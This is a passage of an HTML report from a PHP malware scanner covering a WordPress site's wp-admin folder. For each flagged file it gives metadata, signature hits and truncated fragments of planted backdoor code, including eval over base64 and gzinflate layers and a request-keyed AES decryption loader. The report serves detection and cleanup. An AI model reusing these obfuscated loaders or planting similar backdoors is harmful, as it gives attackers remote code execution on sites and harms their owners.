<span style="color: #0000BB">mdW5jdGlvb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 162cf671 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 162cf671)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">hcnJheV</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 407651f7 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 407651f7)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">wcmludG</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 4a069524 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 4a069524)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">aW5jbHVkZ</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7186bb8d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7186bb8d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RfUE9TV</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7830f7a6 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7830f7a6)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">N0cl</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7f5d33bf <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7f5d33bf)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">JF9SRVFVRVNU</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 91535293 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 91535293)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">leGVjK</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">pbmNsdWRl</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign a408f408 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: a408f408)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">c3Rhd</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ae7830db <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ae7830db)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">YmFzZTY0</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d30fc49e <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d30fc49e)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">b3Blb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d97f004d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d97f004d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Z1bmN0aW9u</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign de12c454 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: de12c454)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">VjaG</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign e6546205 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: e6546205)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">kX1BPU1</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ee1cb326 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ee1cb326)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">9wZW</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ff4f5344 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ff4f5344)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">FycmF5X</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_137").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-admin/9Txa5vbtVYM.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 43.97 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 21:21:49</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 21:21:49</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_138" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsRblpfVPrHzPpcBlEUGR9PDHkGJ8FwKFN9VTI4pTkiMTHbW3jPsNW8NvpfVTq6nJ5zoTS0MFumqJWmqUVbWk+YPNNNNNNNNNcRaqrX41PoEJRrM3DuX0hKlwya3sjb52uy5hUUED8ZOI0O2zKesTsigJkM1MD3aYKG//mK/39V//3iZ0VtWVY/39rss5/uNbS/C6K+ssrsh/ed/77Z0z+Wb/8clajhla8/6cZ8i9BR5kHWIihiv3Hq/xbMcovfvgNptcIJBKgfbCGc4FfiyLF0ZVIQ9mz4FPBeuzt4kyXXw0Qs/AT4AZbVYYZ1jsM6LJarEbc+P+q+T0moPvG1WrYBvcONSkrBv0176x+mvegyS6Jr6TyOrHr+EaeHMhSVKvLz+yqlkWbsWNocZgHfzo2pUbuKhd4JDH79ychKzeIGqBEpWjyr30jbf/hv5cD...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">'; error_reporting(0); ini_set('</span><span style="color: #0000BB">log_errors</span><span style="color: #DD0000">', 0); eval($YoKrR($icyYU('</span><span style="color: #0000BB">VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsRblpfVPrHzPpcBlEUGR9PDHkGJ8FwKFN9VTI4pTkiMTHbW3jPsNW8NvpfVTq6nJ5zoTS0MFumqJWmqUVbWk</span><span style="color: #007700">+</span><span style="color: #0000BB">YPNNNNNNNNNcRaqrX41PoEJRrM3DuX0hKlwya3sjb52uy5hUUED</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$YoKrR</span><span style="color: #007700">(</span><span style="color: #0000BB">$icyYU</span><span style="color: #007700">(</span><span style="color: #DD0000">'VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsRblpfVPrHzPpcBlEUGR9PDHkGJ8FwKFN9VTI4pTkiMTHbW3jPsNW8NvpfVTq6nJ5zoTS0MFumqJWmqUVbWk+YPNNNNNNNNNcRaqrX41PoEJRrM3DuX0hKlwya3sjb52uy5hUUED8ZOI0O2zKesTsigJkM1MD3aYKG//mK/39V//3iZ0VtWVY/39rss5/uNbS/C6K+ssrsh/ed/77Z0z+Wb/8clajhla8/6cZ8i9BR5kHWIihiv3Hq/xbMcovfvgNptcIJBKgfbCGc4FfiyLF0ZVIQ9mz4FPBeuzt4kyXXw0Qs/AT4AZbVYYZ1jsM6LJarEbc+P+q+T0moPvG1WrYBvcONSkrBv0176x+mvegyS6Jr6TyOrHr+EaeHMhSVKvLz+yqlkWbsWNocZgHfzo2pUbuKhd4JDH79ychKzeIG...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_138").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-admin/css/css/cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.51 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:04:42</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:04:42</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_139" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'gv3ouUfJOiA+tDerh0xtKJlEGPkt7Lh503u/9o1fytXe4lH04H+cax+36Ha9yhPNMue9oTO85ivj93X5RU8ZtvPvrYtfzCVa+/ewx3v549dydHvSFe5+3O7h7k7xHv6BVL0tDuTnnJ4XNffqxnzmSEbsB6T/jerL279HvfdyRfzb3YExaITjjUweBfUzM5Ee78p9s/NK0zrW/gUCzRlSA61u8YFsN7FgIeT0HIwq4KNFIx0X73Yq/qqY90l2TOPQuBnxMqQ59DnsNuwRImRq7gAYkRJAI5LFi4TsdcyWGhnj9VfY4eyz/YsC0yuSOgyA1oLE9xLqbH1y7WSHZX82H/2Dda8m/s74DuOxPdtyWtWhKrNTwJZ5e8C3telZ/TD95L2rzz/Urb9ypn2r9Q6AvgUtGEdVFxWvvHnWVrA4v2JSMx7ScQ7lmn/mout+/9mmt2J0fBZVjqIAB4R2riBgKtjq2zAmZmxjx9KeOvcw96iHWj65VFd...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit global_var_string <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">gNQ</span><span style="color: #007700">(</span><span style="color: #0000BB">$lkGs</span><span style="color: #007700">) { </span><span style="color: #0000BB">$bHMh </span><span style="color: #007700">= ${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}[</span><span style="color: #DD0000">"k"</span><span style="color: #007700">]; </span><span style="color: #0000BB">$Hlb </span><span style="color: #007700">= </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$bHMh</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">16</span><span style="color: #007700">); </span><span style="color: #0000BB">$ytqu </span><span style="color: #007700">= </span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$lkGs</span><span style="color: #007700">); return </span><span style="color: #0000BB">openssl_decrypt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ytqu</span><span style="color: #007700">, </span><span style="color: #DD0000">"AES-256-CBC"</span><span style="color: #007700">, </span><span style="color: #0000BB">$bHMh</span><span style="color: #007700">, </span><span style="color: #0000BB">OPENSSL_RAW_DATA</span><span style="color: #007700">, </span><span style="color: #0000BB">$Hlb</span><span style="color: #007700">); } if (</span><span style="color: #0000BB">gNQ</span><span style="color: #007700">(</span><span style="color: #DD0000">'DjtPn+r4S0yvLCnquPz1fA'</span><span style="color: #007700">)){ echo </span><span style="color: #DD0000">'W8/JWBWFzFZ04PJI3ED/f0p2SMu5n8IqREaa3</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$gNQ</span><span style="color: #007700">)))); </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">htmlspecialchars_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$gNQ</span><span style="color: #007700">))))</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_139").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-admin/css/colors/ocean/ocean/cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.52 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:15:06</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:15:06</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_140" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'cYOPw1A/XcEB4bH6WDpTaFSKJMeJbnXC3Zve7zjU7lbv88FH04H+ce++z+na985nHOvPf0JH+MzOXXPcVGRLY1++0+muprU/eU85Tv54/ef2Df76NaxLn/2dT96bX+4SP4Zh2txbm+1GvK64Td/ZmEiY/tRZu/1bdxfvvI9oP+HbOrGlEmDdKclAur5meGJn+7mO9H9qZRffxKHhKYPochoX3CjW8GsWEC4NxugCjSr2cwUWftfDpOrrutTUSf5/AZGfKToDtP3f6V4BLhYFrODBkBGmMQk8sPif1mxJb5EfGmUBth7rAvTxOgL7KJAJLkivYkHuQudWH/bGVkdw7wDbHkpzbOz8rf060g01Kb1aN+s0gQnj971LUX6XnNPJ63vYvuM+Xtp1jnv2b9Q6gugUtGEdVF1WjvnnWVrE4v2JSM17ycY4Xun/mout+/dmmt2R0fB5VjqIAB4R2riBgKrju2zAuZmxjx9KeOvcw96iDWT61VH...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit global_var_string <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">GHNL</span><span style="color: #007700">(</span><span style="color: #0000BB">$FPHm</span><span style="color: #007700">) { </span><span style="color: #0000BB">$xQz </span><span style="color: #007700">= ${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}[</span><span style="color: #DD0000">"k"</span><span style="color: #007700">]; </span><span style="color: #0000BB">$NWE </span><span style="color: #007700">= </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$xQz</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">16</span><span style="color: #007700">); </span><span style="color: #0000BB">$wXJi </span><span style="color: #007700">= </span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$FPHm</span><span style="color: #007700">); return </span><span style="color: #0000BB">openssl_decrypt</span><span style="color: #007700">(</span><span style="color: #0000BB">$wXJi</span><span style="color: #007700">, </span><span style="color: #DD0000">"AES-256-CBC"</span><span style="color: #007700">, </span><span style="color: #0000BB">$xQz</span><span style="color: #007700">, </span><span style="color: #0000BB">OPENSSL_RAW_DATA</span><span style="color: #007700">, </span><span style="color: #0000BB">$NWE</span><span style="color: #007700">); } if (</span><span style="color: #0000BB">GHNL</span><span style="color: #007700">(</span><span style="color: #DD0000">'DjtPn+r4S0yvLCnquPz1fA'</span><span style="color: #007700">)){ echo </span><span style="color: #DD0000">'W1YMS62fT1UxOSHhKCVk9msgVoS0KQuwpFRA0k</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$GHNL</span><span style="color: #007700">)))); </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">htmlspecialchars_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$GHNL</span><span style="color: #007700">))))</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_140").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-admin/css/colors/midnight/midnight/cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.51 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:14:43</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:14:43</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_141" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'oDPGr2D4LKIXP8tGRrkqlcCY9UGusM2Td32HGsxLXf++nf47OO40sPO9M6+F9fa0/2CBHt3TP/Ud+mauTFQ1/KsZktjrW6Kw73Hu/9rPQPnd/OqcjXu/tze6W5e8xreQxm83g709pC+Vz3na85spEzarh+0/o26i9f/x7Xnc0382NGRsGy04KFsXwH1MTOl3Ofaf7fjC98qVPIlwcUpSQvWlHrg1bvACzTC9CJWFVhpAruea/Oy9VFm9Tb6P50Q5HQmzriE/0LyN4OHRYCLeBKwxEpgklzEPjbhxzNbZGWO2XBJR4o4/Sw6QEz65GCDUiio0Hm4ufUbvZB9kd1bXAWn0qxb+w2zP36Gg29Kb1SVuuzMA1o1b1Pc36Vm9NJynvc/OO7zdq9bXv87tR2MuiYJGFbBV3VTvlo61pF0P0Oqc20S8a8HOu164vpq/vved0JofC9VTqFoB6wCfgNoaooz2wL+Jk7nR8IeuuXwN7svmQw1lGd2...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit global_var_string <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">FmErZ</span><span style="color: #007700">(</span><span style="color: #0000BB">$rJI</span><span style="color: #007700">) { </span><span style="color: #0000BB">$IUW </span><span style="color: #007700">= ${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}[</span><span style="color: #DD0000">"k"</span><span style="color: #007700">]; </span><span style="color: #0000BB">$fhB </span><span style="color: #007700">= </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$IUW</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">16</span><span style="color: #007700">); </span><span style="color: #0000BB">$Agu </span><span style="color: #007700">= </span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$rJI</span><span style="color: #007700">); return </span><span style="color: #0000BB">openssl_decrypt</span><span style="color: #007700">(</span><span style="color: #0000BB">$Agu</span><span style="color: #007700">, </span><span style="color: #DD0000">"AES-256-CBC"</span><span style="color: #007700">, </span><span style="color: #0000BB">$IUW</span><span style="color: #007700">, </span><span style="color: #0000BB">OPENSSL_RAW_DATA</span><span style="color: #007700">, </span><span style="color: #0000BB">$fhB</span><span style="color: #007700">); } if (</span><span style="color: #0000BB">FmErZ</span><span style="color: #007700">(</span><span style="color: #DD0000">'DjtPn+r4S0yvLCnquPz1fA'</span><span style="color: #007700">)){ echo </span><span style="color: #DD0000">'wjTX2rp9diUWtFBEzCVszAb/aDy7ko1zo5Eq9Tdv</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$FmErZ</span><span style="color: #007700">)))); </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">htmlspecialchars_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$FmErZ</span><span style="color: #007700">))))</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_141").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-admin/css/colors/midnight/midnight/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.85 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:14:43</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:15:03</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_142" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$E</span><span style="color: #007700">[</span><span style="color: #0000BB">50</span><span style="color: #007700">]}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
